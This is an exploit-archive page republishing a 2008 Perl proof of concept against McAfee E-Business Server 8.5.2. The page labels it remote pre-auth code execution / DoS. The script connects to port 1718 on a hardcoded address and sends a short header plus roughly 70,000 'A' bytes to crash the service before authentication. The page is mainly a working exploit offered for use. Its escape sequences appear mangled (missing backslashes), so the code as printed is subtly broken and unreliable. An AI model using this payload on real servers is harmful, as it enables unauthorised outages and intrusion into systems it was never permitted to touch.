McAfee E-Business Server Remote pre-auth Code Execution / DoS PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : McAfee E-Business Server Remote pre-auth Code Execution / DoS PoC
# Published : 2008-01-09
# Author : Leon Juranic
# Previous Title : Quicktime Player <= 7.3.1.70 (rtsp) Buffer Overflow Vulnerability
# Next Title : Half-Life CSTRIKE Server 1.6 Denial of Service Exploit (no-steam)

#!/usr/bin/perl
#
#
# McAfee(R) E-Business Server(TM) 8.5.2 Remote preauth crash (PoC)
#
# - tested on Windows and Linux
#
#
# Leon Juranic <leon.juranic@infigo.hr>, 
# Infigo IS <http://www.infigo.hr/en/>
#


use IO::Socket;

$saddr = "192.168.1.3";
$sport = 1718;

$exp1 = "x01x3fx2fx05x25x2a" . "A" x 69953;;

print "> Sending exploit string...n";
my $server_sock = IO::Socket::INET->new (PeerAddr => $saddr, PeerPort => $sport) || die ("Cannot connect to server!!!nn");
print $server_sock $exp1;

# www.Syue.com [2008-01-09]